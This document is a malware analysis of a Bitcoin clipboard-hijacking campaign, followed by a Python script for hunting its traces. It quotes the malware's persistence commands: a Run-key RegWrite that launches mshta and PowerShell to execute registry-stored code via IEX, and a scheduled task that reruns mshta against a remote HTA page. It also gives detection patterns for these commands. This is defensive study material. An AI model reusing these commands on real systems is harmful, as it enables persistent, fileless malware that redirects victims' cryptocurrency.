Hijacking a Bitcoin address on the victim’s device

After being decoded, we obtained the second piece of VBScript code. Executing it saves a batch of PowerShell code into the system registry under HKCU\Software, in a value named nasdnasndnad (the value that the Run entry below reads back with (gp HKCU:\Software).nasdnasndnad). It also adds an item to the Auto-Run group in the system registry so that this PowerShell code is executed at system startup (refer to the item “replcia” in Figure 3.2). To do so, it executes the following code:

```vbscript
MicrosoftWINdows.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\replcia", "mshta vbscript:Execute(""CreateObject(""""Wscript.Shell"""").Run """"powershell ((gp HKCU:\Software).nasdnasndnad)|IEX"""", 0 : window.close"")", EXCELX
```

The Run entry launches mshta with a vbscript: URL, so the script executes inline without any file on disk; that script in turn starts PowerShell, which reads the stored code out of the registry and passes it to IEX (Invoke-Expression).

Going through the PowerShell code we can see that it performs a Bitcoin address hijack. It does this by continually inspecting the data on the system clipboard: whenever the clipboard holds a valid Bitcoin address, it replaces that address with the attacker’s.

Besides adding items to the Auto-Run group, it adds a scheduled task in Task Scheduler to keep the whole campaign running. Below is the code used to run schtasks to create the new scheduled task:

```vbscript
Run "schtasks /create /sc MINUTE /mo 80 /tn \"WIND0WSUPLATE\" /F /tr \"MsHtA\" 27.html\"", 0
```

Its action is to execute the command “mshta ... 27.html”, and it is triggered every 80 minutes.

It also creates a WMI (Windows Management Instrumentation) object and calls its SetStringValue() method to add an item to the Auto-Run group.
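The persistence chain described above (a Run value that launches mshta with a vbscript: URL, a PowerShell one-liner that pulls its code from a registry value and pipes it to IEX, and a schtasks entry that reruns mshta against a remote page) leaves distinctive traces. The script below is an added example written for this page, not code from the original analysis or from the malware. It applies the checks a responder would run over exported Run-key values and scheduled tasks, and includes a helper that turns the RegWrite string literal as it appears in the dropper into the value that actually lands in the registry. The sample entries are constructed: the two malicious ones are modelled on the fragments quoted above, the HTA URL is a placeholder because the page truncates it, and the digit-zero lookalike check on task names is our own heuristic, not something the analysis describes.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# --- constructed sample data (not taken from a real host) ---------------------
# Run-key values and scheduled tasks as a responder might export them. The two
# malicious entries are modelled on the fragments quoted in the analysis above;
# the HTA URL is a placeholder because the page truncates it.
SAMPLE_RUN_VALUES: Dict[str, str] = {
    "OneDrive": r'"C:\Users\victim\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "replcia": (
        'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run '
        '""powershell ((gp HKCU:\\Software).nasdnasndnad)|IEX"", 0 : window.close")'
    ),
}
SAMPLE_TASKS: List[Dict[str, object]] = [
    {"name": "WIND0WSUPLATE", "schedule": "MINUTE", "modifier": 80,
     "action": "MsHtA http://hta.example.invalid/27.html"},   # placeholder URL
    {"name": "Adobe Acrobat Update Task", "schedule": "DAILY", "modifier": 1,
     "action": r'"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"'},
]

# --- indicators ---------------------------------------------------------------
# mshta given a script-protocol URL runs the inline script instead of an .hta file
MSHTA_INLINE = re.compile(r"\bmshta(?:\.exe)?\b.*?\b(vbscript|javascript):", re.I | re.S)
# mshta fetching an .hta/.html from a remote host
MSHTA_REMOTE = re.compile(r"\bmshta(?:\.exe)?\b\s+[\"']?(https?://\S+)", re.I)
# PowerShell reading a registry value as code, e.g. (gp HKCU:\Software).Name
PS_REG_READ = re.compile(
    r"\(\s*(?:gp|Get-ItemProperty)\s+([A-Za-z]+:\\[^)\s]*)\s*\)\.(\w+)", re.I)
PS_IEX = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)
# digit 0 wedged between letters, as in WIND0WSUPLATE (our lookalike heuristic)
ZERO_FOR_O = re.compile(r"[A-Za-z]0[A-Za-z]")


@dataclass
class Finding:
    source: str
    reasons: List[str] = field(default_factory=list)
    registry_stash: Optional[Tuple[str, str]] = None  # (key path, value name)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def vbs_unescape(literal: str) -> str:
    """Turn a VBScript string literal (as written in the dropper source) into
    the value it produces at runtime: drop the outer quotes and collapse the
    doubled inner quotes."""
    literal = literal.strip()
    if len(literal) >= 2 and literal[0] == '"' and literal[-1] == '"':
        literal = literal[1:-1]
    return literal.replace('""', '"')


def analyze_run_value(name: str, command: str) -> Finding:
    """Check one Run-key value for the mshta -> inline script -> PowerShell ->
    registry-stored code -> IEX chain."""
    f = Finding(source=f"run:{name}")
    m = MSHTA_INLINE.search(command)
    if m:
        f.reasons.append(f"mshta runs inline {m.group(1).lower()}: script")
    m = PS_REG_READ.search(command)
    if m:
        f.registry_stash = (m.group(1), m.group(2))
        f.reasons.append(f"PowerShell reads code from {m.group(1)} value {m.group(2)}")
        if PS_IEX.search(command):
            f.reasons.append("registry contents are piped to Invoke-Expression")
    return f


def analyze_task(task: Dict[str, object]) -> Finding:
    """Check one scheduled task for mshta-based re-execution of remote content."""
    name = str(task["name"])
    f = Finding(source=f"task:{name}")
    m = MSHTA_REMOTE.search(str(task["action"]))
    if m:
        f.reasons.append(f"mshta loads remote HTA {m.group(1)}")
    if str(task["schedule"]).upper() == "MINUTE":
        f.reasons.append(f"reruns every {task['modifier']} minute(s)")
    if ZERO_FOR_O.search(name):
        f.reasons.append("task name uses digit 0 as a lookalike for O")
    return f


def hunt(run_values: Dict[str, str], tasks: List[Dict[str, object]]) -> List[Finding]:
    """Return only the entries that tripped at least one indicator."""
    results = [analyze_run_value(n, c) for n, c in run_values.items()]
    results += [analyze_task(t) for t in tasks]
    return [r for r in results if r.suspicious]


if __name__ == "__main__":
    for hit in hunt(SAMPLE_RUN_VALUES, SAMPLE_TASKS):
        print(hit.source)
        for reason in hit.reasons:
            print("   -", reason)
```

On a live host the same functions can be fed the output of Get-ItemProperty on the HKCU and HKLM Run keys and of schtasks /query /v (or Get-ScheduledTask), which covers the entries written here through RegWrite and through the WMI SetStringValue() path alike, since both end up as ordinary Run values. Passing the RegWrite argument through vbs_unescape shows what to expect in the registry when the sample has only been read, not run.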